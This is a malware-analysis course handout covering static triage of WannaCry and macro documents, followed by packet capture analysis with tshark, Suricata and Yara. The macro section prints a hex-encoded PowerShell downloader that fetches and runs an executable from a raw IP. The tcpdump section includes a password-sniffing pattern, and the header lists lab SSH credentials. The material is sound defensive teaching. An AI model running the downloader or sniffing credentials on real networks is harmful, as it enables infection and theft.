#####################################################

# Advanced Malware Analysis 2020 #

# By Joe McCray #
#####################################################

- Here is a good set of slides for getting started with Linux:

http://www.slideshare.net/olafusimichael/linux-training-24086319

- Here is a good tutorial that you should complete before doing the labs below:
http://linuxsurvival.com/linux-tutorial-introduction/

- I prefer to use Putty to SSH into my Linux host.

- You can download Putty from here:
- http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe

Here is the information to put into putty

Host Name: 155.138.209.44

protocol: ssh
port: 22
username: ama
password: ama-secureninja!

Indicators of Compromise (IoC)

-----------------------------

1. Modify the filesystem

2. Modify the registry - ADVAPI32.dll (persistance)
3. Modify processes/services
4. Connect to the network - WS2_32.dll

if you can't detect a registry change across 5% of your network

EDR Solution
------------

1. Static Analysis <----------------------------------------- Cloud based static

analysis
Learn everything I can without actually running the file
- Modify FS - File integrity checker
- Modify registry
- Modify processes/services
- Connect to the network

2. Dynamic Analysis
Runs the file in a VM/Sandbox

################
# The Scenario #
################
You've come across a file that has been flagged by one of your security products
(AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).

The fastest thing you can do is perform static analysis.

###################
# Static Analysis #
###################

---------------------------Type This-----------------------------------

cd ~/static_analysis

file wannacry.exe

cp wannacry.exe malware.pdf

file malware.pdf

hexdump -n 2 -C wannacry.exe

----------------------------------------------------------------------

***What is '4d 5a' or 'MZ'***

-------------------------Paste this URL into
Firefox-----------------------------------
http://www.garykessler.net/library/file_sigs.html
-----------------------------------------------------------------------------------
----

---------------------------Type This-----------------------------------
cd ~/static_analysis

objdump -x wannacry.exe

objdump -x wannacry.exe | less

q

strings wannacry.exe

strings wannacry.exe | grep -i dll

strings wannacry.exe | grep -i library

strings wannacry.exe | grep -i reg

strings wannacry.exe | grep -i key

strings wannacry.exe | grep -i rsa

strings wannacry.exe | grep -i open

strings wannacry.exe | grep -i get

strings wannacry.exe | grep -i mutex

strings wannacry.exe | grep -i irc

strings wannacry.exe | grep -i join

strings wannacry.exe | grep -i admin

strings wannacry.exe | grep -i list

----------------------------------------------------------------------

Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"

Quick Google search for "wannacry ransomeware analysis"

Reference
https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-
ransomware-outbreak/

- Yara Rule -

Strings:
$s1 = “Ooops, your files have been encrypted!” wide ascii nocase
$s2 = “Wanna Decryptor” wide ascii nocase
$s3 = “.wcry” wide ascii nocase
$s4 = “WANNACRY” wide ascii nocase
$s5 = “WANACRY!” wide ascii nocase
$s7 = “icacls . /grant Everyone:F /T /C /Q” wide ascii nocase

Ok, let's look for the individual strings

---------------------------Type This-----------------------------------
cd ~/static_analysis

strings wannacry.exe | grep -i ooops

strings wannacry.exe | grep -i wanna

strings wannacry.exe | grep -i wcry

strings wannacry.exe | grep -i wannacry

strings wannacry.exe | grep -i wanacry **** Matches $s5, hmmm.....

----------------------------------------------------------------------

####################################
# Tired of GREP - let's try Python #
####################################
Decided to make my own script for this kind of stuff in the future. This is a
really good script for the basics of static analysis

Reference:
https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html

This is really good for showing some good signatures to add to the Python script

---------------------------Type This-----------------------------------
cd ~/static_analysis

nano am.py

python3 am.py wannacry.exe

----------------------------------------------------------------------

#####################################################
# Analyzing Macro Embedded Malware #
#####################################################
---------------------------Type This-----------------------------------
cd ~/static_analysis/oledump

python oledump.py 064016.doc

python oledump.py 064016.doc -s A4 -v

-----------------------------------------------------------------------

- From this we can see this Word doc contains an embedded file called editdata.mso
which contains seven data streams.
- Three of the data streams are flagged as macros: A3:’VBA/Module1′,
A4:’VBA/Module2′, A5:’VBA/ThisDocument’.

---------------------------Type This-----------------------------------
python oledump.py 064016.doc -s A5 -v
-----------------------------------------------------------------------

- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical
functions designed to confuse heuristic scanners.
---------------------------Type This-----------------------------------
python oledump.py 064016.doc -s A3 -v

- Look for "GVhkjbjv" and you should see:

636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C6963792062797
0617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562
436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6
173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E6361622729
3B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A4
94F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F4948
2E6578653B

- Take that long blob that starts with 636D and finishes with 653B and paste it in:
http://www.rapidtables.com/convert/number/hex-to-ascii.htm
-----------------------------------------------------------------------

#########################################
# Security Operations Center Job Roles #
# Intrusion Analysis Level 1 #
#########################################
Required Technical Skills: Comfortable with basic Linux/Windows
(MCSA/Linux+)
Comfortable with basic network
(Network+)
Comfortable with security
fundamentals (Security+)

Job Task: Process security events, follow incident

response triage playbook

#########################################
# Security Operations Center Job Roles #
# Intrusion Analysis Level 2 #
#########################################

Required Technical Skills: Comfortable with basic Linux/Windows system

administration
Comfortable with basic network
administration
Comfortable with basic programming
Comfortable researching IT security
issues

Job Task: Perform detailed malware analysis, assist

with development of the incident response triage playbook

#########################################
# Security Operations Center Job Roles #
# Intrusion Analysis Level 3 #
#########################################

Required Technical Skills: Strong statistical analysis background

Strong programming background (C,
C++, Java, Assembly, scripting languages)
Advanced system/network
administration background
Comfortable researching IT security
issues

Job Task: Perform detailed malware analysis

Perform detailed statistical
analysis
Assist with development of the
incident response triage playbook

-----------------------------------------------------------------------------------
--------------------------------------
#######################
# Passive Recon #
# aka: OSINT #
# aka: Footprinting #
#######################

- Wikipedia Page
- Are they Public or Private?
- Does the target have any subsidiaries?
- Have they had any scandals?

- Robtex
- Show system map

- Sample OSINT Report:

https://infosecaddicts-files.s3.amazonaws.com/OSINT_Innophos.doc

- Misc
OSINT on a hacker group:
https://en.wikipedia.org/wiki/Anonymous_(group)
https://en.wikipedia.org/wiki/LulzSec

OSINT on a terrorist group:

https://en.wikipedia.org/wiki/Al-Qaeda
https://en.wikipedia.org/wiki/Taliban
https://en.wikipedia.org/wiki/Islamic_State_of_Iraq_and_the_Levant

Step 1: Receive suspicious file

-------------------------------
- Help Desk tickets
- SIEM
- AV
- EDR
- Email/Spam
- Proxy

Step 2: Perform static analysis

-------------------------------
1. Run strings/grep for primary IoCs
- Modifies the registry
- Modifies processes/services
- Modifies the filesystem
- Connects to the network

A yes to these should help you determine whether you want to do dynamic
analysis or not

Consideration 1: Encryption/Obfuscation - you may have to do dynamic analysis

Consideration 2: If you dealing with anti-analysis - you may have to do

static analysis

Step 3: Determine if the malware modifies the registry

------------------------------------------------------
strings wannacry.exe | grep -i reg

*** fix syntax *** strings wannacry.exe | grep -i

"HKEY_CURRENT_USER","HKEY_CLASSES_ROOT","HKEY_LOCAL_MACHINE","HKCU","HKLM",
"RegCloseKey","HKEY_CURRENT_CONFIG","HKEY_USERS"]

strings wannacry.exe | grep -i hkcu

strings wannacry.exe | grep -i hklm

strings wannacry.exe | grep -i hkcr

Step 4: Determine if the malware modifies processes/services

------------------------------------------------------------
strings wannacry.exe | grep -i advapi32

strings wannacry.exe | grep -i service

strings wannacry.exe | grep -i OpenSCManagerA

strings wannacry.exe | grep -i OpenSCManagerA

strings wannacry.exe | grep -i InternetCloseHandle

strings wannacry.exe | grep -i OpenServiceA

strings wannacry.exe | grep -i CloseServiceHandle

strings wannacry.exe | grep -i StartServiceCtrlDispatcherA

strings wannacry.exe | grep -i GetExitCodeProcess

strings wannacry.exe | grep -i GetProcAddress

Step 4: Determine if the malware modifies the file system

------------------------------------------------------------
strings wannacry.exe | grep -i GetTempPathW

strings wannacry.exe | grep -i GetWindowsDirectoryW

strings wannacry.exe | grep -i %TEMP%

strings wannacry.exe | grep -i GetFileAttributesA

Step 5: Does the malware have any persistence capability

--------------------------------------------------------
3 main ways for an attacker to maintain access to a compromised system
(persistence)

- Registry
- Service
- Scheduled task

##############
# Class task #
##############

Task 1: Go to https://joesecurity.org/joe-sandbox-reports

Identify 5 reports for malware that are similar to what you've seen or been
concerned about in your environment

1. Maze
2. Bad rabbit
3. Trojanized Adobe Installer
4. Emotel
5. bitcoin miner

Task 2: What do you want to be able to find

What did you see in each of these reports that you found interesting and would like
to be able to look for in your investigations?
Task 3: Identify the unique strings that you would like to search for
1.
2.
3.

Task 4: Unique classes of attack

Identify the unique classes of signatures that interest us the most that are NOT in
my am.py file list
1. Trickier http request methods
2. Dynamic libraries/API calls
3. Lateral movement

Task 5: Identify limitations of the script

1. Only analyzes exes
2. Too many functions and no classes
3. Not modular enough
4. Signature list is not very thorough
5. Doesn't save to db

---------------------------Type This-----------------------------------
cd /home/ama/malware_samples/office-doc_files

file sample1.doc

olevba sample1.doc

python /home/ama/static_analysis/oledump/oledump.py sample1.doc

----------------------------------------------------------------------

What is oledump.py?
===================

Reference: https://blog.didierstevens.com/programs/oledump-py/

oledump.py is a program to analyze OLE files (Compound File Binary Format). These
files contain streams of data. oledump allows you to analyze these streams.

Many applications use this file format, the best known is MS Office. .doc, .xls,
.ppt, … are OLE files (docx, xlsx, … is the new file format: XML inside ZIP).

What is olevba?
===============

Reference: https://github.com/decalage2/oletools/wiki/olevba

olevba is a script to parse OLE and OpenXML files such as MS Office documents (e.g.
Word, Excel), to detect VBA Macros, extract their source code in clear text, and
detect security-related patterns such as auto-executable macros, suspicious VBA
keywords used by malware, anti-sandboxing and anti-virtualization techniques, and
potential IOCs (IP addresses, URLs, executable filenames, etc). It also detects and
decodes several common obfuscation methods including Hex encoding, StrReverse,
Base64, Dridex, VBA expressions, and extracts IOCs from decoded strings. XLM/Excel
4 Macros are also supported in Excel and SLK files.

It can be used either as a command-line tool, or as a python module from your own
applications.

It is part of the python-oletools package.

Now let's dig in with oledump

---------------------------Type This-----------------------------------
python /home/ama/static_analysis/oledump/oledump.py sample1.doc -s A7 -v

python /home/ama/static_analysis/oledump/oledump.py sample1.doc -s A8 -v

python /home/ama/static_analysis/oledump/oledump.py sample1.doc -s A9 -v

----------------------------------------------------------------------

Now let's dig in with olevba

---------------------------Type This-----------------------------------
olevba sample1.doc --decode

olevba sample1.doc --deobf

----------------------------------------------------------------------

###########
############################## EXE Files ###############################
###########

OK, let's take a look at exe files

---------------------------Type This-----------------------------------
cd /home/ama/malware_samples/exe_files

objdump -x sample1.exe

objdump -x sample1.exe | less

q

strings sample1.exe

strings sample1.exe | grep -i dll

strings sample1.exe | grep -i library

strings sample1.exe | grep -i reg

strings sample1.exe | grep -i key

strings sample1.exe | grep -i rsa

strings sample1.exe | grep -i open

strings sample1.exe | grep -i get

strings sample1.exe | grep -i mutex

strings sample1.exe | grep -i irc

strings sample1.exe | grep -i join

strings sample1.exe | grep -i admin

strings sample1.exe | grep -i list

python3 ~/am.py sample1.exe

----------------------------------------------------------------------

Let's play with another tool called pyew.

Reference: https://github.com/joxeankoret/pyew

Pyew is a tool like radare or biew/hiew. It’s an hexadecimal viewer, disassembler

for IA32 and AMD64 with support for PE & ELF formats as well as other non
executable formats, like OLE2 or PDF.

---------------------------Type This-----------------------------------
pyew sample1.exe

[0x00000000]> ?

[0x00000000]> md5

[0x00000000]> sha256

[0x00000000]> url

[0x00000000]> chkurl
----------------------------------------------------------------------

Since this is a PE file, let's do some stuff that's specific for exe files

Here are the commands again:

Commands:

?/help Show this help

x/dump/hexdump Show hexadecimal dump
s/seek Seek to a new offset
g/G Goto BOF (g) or EOF (G)
+/- Go forward/backward one block (specified by
pyew.bsize)
c/d/dis/pd Show disassembly
r/repr Show string represantation
p Print the buffer
/x expr Search hexadecimal string
/s expr Search strings
/i expr Search string ignoring case
/r expr Search regular expression
/u expr Search unicode expression
/U expr Search unicode expression ignoring case

Now, let's see the disassembly at the entry point so, seek to the entry point:
---------------------------Type This-----------------------------------
[0x00000000]> s ep
-----------------------------------------------------------------------

And disassemble it with the command "c" (you may also use "d", "dis" or "pd"):
---------------------------Type This-----------------------------------
[0x00025ce0:0x00426ae0]> c
-----------------------------------------------------------------------

To see the code at the function's position, just type the number assigned to the
function (the number after the ";" character):
---------------------------Type This-----------------------------------
[0x00025ce0:0x00426ae0]> 1
[0x00025d07:0x00426b07]> 2
-----------------------------------------------------------------------

OK, we're done analyzing this function. To go back to the prior point (the entry
point in our case) we can type "b" to go back:
---------------------------Type This-----------------------------------
[0x00025d07:0x00426b07]> b
-----------------------------------------------------------------------

To continue seeing more disassembly just press the enter key to see the next
block's disasembly (BTW, if the last command was "x" to show the hexadecimal dump,
by pressing enter you would see the next block's hexadecimal dump):

To list the functions detected by Pyew type "pyew.names":

---------------------------Type This-----------------------------------
[0x00025cfe:0x00426afe]> pyew.names
-----------------------------------------------------------------------

Let's see if it was packed

---------------------------Type This-----------------------------------
[0x00025ce0:0x00426ae0]> packer
-----------------------------------------------------------------------
Let's see if it uses any anti virutal machine tricks
---------------------------Type This-----------------------------------
[0x00025ce0:0x00426ae0]> antivm
-----------------------------------------------------------------------

#########################
----------- ############### # Playing with packets # ############### -----------
#########################

####################
# Intro to TCPDump #
####################
---------------------------Type This-----------------------------------
sudo apt-get install -y tcpdump lynx
-----------------------------------------------------------------------

Basic sniffing
--------------
---------------------------Type This-----------------------------------
sudo tcpdump -n
-----------------------------------------------------------------------

Now lets increase the display resolution of this packet, or get more details about
it. The verbose switch comes in handy
---------------------------Type This-----------------------------------
sudo tcpdump -v -n
-----------------------------------------------------------------------

Getting the ethernet header (link layer headers)

------------------------------------------------
In the above examples details of the ethernet header are not printed. Use the -e
option to print the ethernet header details as well.
---------------------------Type This-----------------------------------
sudo tcpdump -vv -n -e
------------------------------------------------------------------------

Sniffing a particular interface

-------------------------------
In order to sniff a particular network interface we must specify it with the -i
switch. First lets get the list of available interfaces using the -D switch.
---------------------------Type This-----------------------------------
sudo tcpdump -D
------------------------------------------------------------------------

Filtering packets using expressions - Selecting protocols

---------------------------------------------------------

---------------------------Type This-----------------------------------
$ sudo tcpdump -n tcp
------------------------------------------------------------------------
Particular host or port
-----------------------
Expressions can be used to specify source ip, destination ip, and port numbers. The
next example picks up all those packets with source address 192.168.1.101
---------------------------Type This-----------------------------------
$ sudo tcpdump -n 'src 192.168.1.101'
------------------------------------------------------------------------

Next example picks up dns request packets, either those packets which originate
from local machine and go to port 53 of some other machine.
---------------------------Type This-----------------------------------
$ sudo tcpdump -n 'udp and dst port 53'
------------------------------------------------------------------------

To display the FTP packets coming from 192.168.1.100 to 192.168.1.2

---------------------------Type This-----------------------------------
$ sudo tcpdump 'src 192.168.1.100 and dst 192.168.1.2 and port ftp'
------------------------------------------------------------------------

Search the network traffic using grep

Grep can be used along with tcpdump to search the network traffic. Here is a very
simple example
---------------------------Type This-----------------------------------
$ sudo tcpdump -n -A | grep -e 'POST'
------------------------------------------------------------------------

So what is the idea behind searching packets. Well one good thing can be to sniff
passwords.
Here is quick example to sniff passwords using egrep

---------------------------Type This-----------------------------------
tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep
-i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|
user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20
------------------------------------------------------------------------

#########
# NGrep #
#########

Install ngrep on Ubuntu

---------------------------Type This-----------------------------------
$ sudo apt-get install ngrep
------------------------------------------------------------------------

Search network traffic for string "User-Agent: "

---------------------------Type This-----------------------------------
$ sudo ngrep -d ens3 "User-Agent: " tcp and port 80
------------------------------------------------------------------------
In the above command :
a) tcp and port 80 - is the bpf filter (Berkeley Packet Filter) , that sniffs only
TCP packet with port number 80
b) The d option specifies the interface to sniff. ens3 in this case.
c) "User-Agent: " is the string to search for. All packets that have that string
are displayed.
2. Search network packets for GET or POST requests :
---------------------------Type This-----------------------------------
$ sudo ngrep -l -q -d ens3 "^GET |^POST " tcp and port 80
------------------------------------------------------------------------
The l option makes the output buffered and the q option is for quiet ( Be quiet;
don't output any information other than packet headers and their payloads (if
relevant) ).

3. ngrep without any options would simply capture all packets.

---------------------------Type This-----------------------------------
$ sudo ngrep
------------------------------------------------------------------------

Reference:
https://dl.packetstormsecurity.net/papers/general/ngreptut.txt
---------------------------Type This-----------------------------------
$ sudo ngrep -d ens3 -n 3

$ sudo ngrep -d any port 25

------------------------------------------------------------------------

This will let you monitor all activity crossing source or destination port 25
(SMTP).
---------------------------Type This-----------------------------------
$ sudo ngrep -wi -d wlan0 'user|pass' port 6667

$ sudo ngrep -wi -d any 'user|pass' port 21

------------------------------------------------------------------------

###############################
----------- ############### # Threat Hunting on the wire # ###############
-----------
###############################

##################################################################
# Analyzing a PCAP Prads #
# Note: run as regular user #
##################################################################

---------------------------Type this as a regular

user----------------------------------
cd ~

mkdir pcap_analysis/

cd ~/pcap_analysis/

mkdir prads

cd ~/pcap_analysis/prads

wget http://45.63.104.73/suspicious-time.pcap
prads -r suspicious-time.pcap -l prads-asset.log

cat prads-asset.log | less

cat prads-asset.log | grep SYN | grep -iE 'windows|linux'

cat prads-asset.log | grep CLIENT | grep -iE 'safari|firefox|opera|chrome'

cat prads-asset.log | grep SERVER | grep -iE 'apache|linux|ubuntu|nginx|iis'

-----------------------------------------------------------------------

##################################
# PCAP Analysis with ChaosReader #
# Note: run as regular user #
##################################
---------------------------Type this as a regular
user----------------------------------
cd ~

mkdir -p pcap_analysis/chaos_reader/

cd ~/pcap_analysis/chaos_reader/

wget http://45.63.104.73/suspicious-time.pcap

wget http://45.63.104.73/chaosreader.pl

perl chaosreader.pl suspicious-time.pcap

cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"

cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4,
$5, $6}' | sort | uniq -c | sort -nr

for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk

'{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print
$4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e
's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u

for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk

'{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print
$4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e
's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u | awk '{print
$5}' > url.lst

wget https://raw.githubusercontent.com/Open-Sec/forensics-scripts/master/check-
urls-virustotal.py

python check-urls-virustotal.py url.lst

python -m SimpleHTTPServer
****** Open a web browser and browse the the IP address of your Linux
machine port 8000 for the web page *****

------------------------------------------------------------------------

#############################
# PCAP Analysis with tshark #
# Note: run as regular user #
#############################
---------------------------Type this as a regular
user---------------------------------
cd ~/pcap_analysis/

mkdir tshark

cd ~/pcap_analysis/tshark

wget http://45.63.104.73/suspicious-time.pcap

tshark -i ens3 -r suspicious-time.pcap -qz io,phs

tshark -r suspicious-time.pcap -qz ip_hosts,tree

tshark -r suspicious-time.pcap -Y "http.request" -Tfields -e "ip.src" -e

"http.user_agent" | uniq

tshark -r suspicious-time.pcap -Y "dns" -T fields -e "ip.src" -e

"dns.flags.response" -e "dns.qry.name"

tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e

http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'

whois rapidshare.com.eyu32.ru

whois sploitme.com.cn

tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e

http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' |
grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'

tshark -r suspicious-time.pcap -qz http_req,tree

tshark -r suspicious-time.pcap -Y "data-text-lines contains \"<script\"" -T fields

-e frame.number -e ip.src -e ip.dst

tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e

http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' |
grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?
[^cse].*/\?\.\.\./g'
------------------------------------------------------------------------

###############################
# Extracting files from PCAPs #
# Note: run as regular user #
###############################
---------------------------Type this as a regular
user---------------------------------
sudo apt install -y foremost

cd ~/pcap_analysis/

mkdir extract_files

cd extract_files

wget http://45.63.104.73/suspicious-time.pcap

foremost -v -i suspicious-time.pcap

cd output

ls

cat audit.txt

cd exe

wget https://raw.githubusercontent.com/GREEKYnikhilsharma/Xen0ph0n-
VirusTotal_API_Tool-Python3/master/vtlite.py

******* NOTE: You will need to put your virustotal API key in vtlite.py *******

for f in *.exe; do python3 vtlite.py -s $f; done

-----------------------------------------------------------------------------------
----

###################################
# Setting up Suricata #
# Note: run as root user #
###################################

Here is where we will setup all of the required dependencies for the tools we plan
to install
---------------------------Type this as root--------------------------
apt update
apt-get install -y libpcre3-dbg libpcre3-dev autoconf automake libtool libpcap-dev
libnet1-dev libyaml-dev libjansson4 libcap-ng-dev libmagic-dev libjansson-dev
zlib1g-dev libnetfilter-queue-dev libnetfilter-queue1 libnfnetlink-dev cmake make
gcc g++ flex bison libpcap-dev libssl-dev unzip python-dev swig zlib1g-dev sendmail
sendmail-bin prads tcpflow python-scapy python-yara tshark whois jq prads foremost
python3-dnspython
-----------------------------------------------------------------------
Now we install Suricata
---------------------------Type this as root-------------------------------
cd /root/

wget https://www.openinfosecfoundation.org/download/suricata-4.0.5.tar.gz

tar -zxvf suricata-4.0.5.tar.gz

cd suricata-4.0.5

./configure --enable-nfqueue --prefix=/usr --sysconfdir=/etc --localstatedir=/var

make

make install

make install-conf

cd rules

cp *.rules /etc/suricata/rules/

cd /etc/suricata/

wget https://rules.emergingthreats.net/open/suricata-4.0/emerging.rules.tar.gz

tar -zxvf emerging.rules.tar.gz

-----------------------------------------------------------------------

###############################
# PCAP Analysis with Suricata #
# Note: run as root #
###############################
--------------------------Type this as root--------------------------------
cd ~

mkdir suricata/

cd suricata/

wget http://45.63.104.73/suspicious-time.pcap

sudo suricata -c /etc/suricata/suricata.yaml -r suspicious-time.pcap -l suri/

cd suri/

cat stats.log | less

cat eve.json |grep -E "e\":\"http"|jq ".timestamp,.http"|csplit - /..T..:/ {*}

cat xx01

cat xx02
cat xx03

cat xx04

cat xx05

cat xx06
------------------------------------------------------------------------

#############################
# PCAP Analysis with Yara #
# Note: run as regular user #
#############################
-------------------------Type this as a regular
user----------------------------------
cd ~/pcap_analysis/

git clone https://github.com/kevthehermit/YaraPcap.git

cd YaraPcap/

wget http://45.63.104.73/suspicious-time.pcap

wget https://github.com/Yara-Rules/rules/archive/master.zip

unzip master.zip

cd rules-master/

ls

cat index.yar

clear

./index_gen.sh

cd ..

mkdir matching_files/

python yaraPcap.py rules-master/index.yar suspicious-time.pcap -s matching_files/

whereis tcpflow

vim yaraPcap.py **** fix line 35 with correct path to tcpflow ****

python yaraPcap.py rules-master/index.yar suspicious-time.pcap -s matching_files/

cd matching_files/

ls

cat report.txt
------------------------------------------------------------------------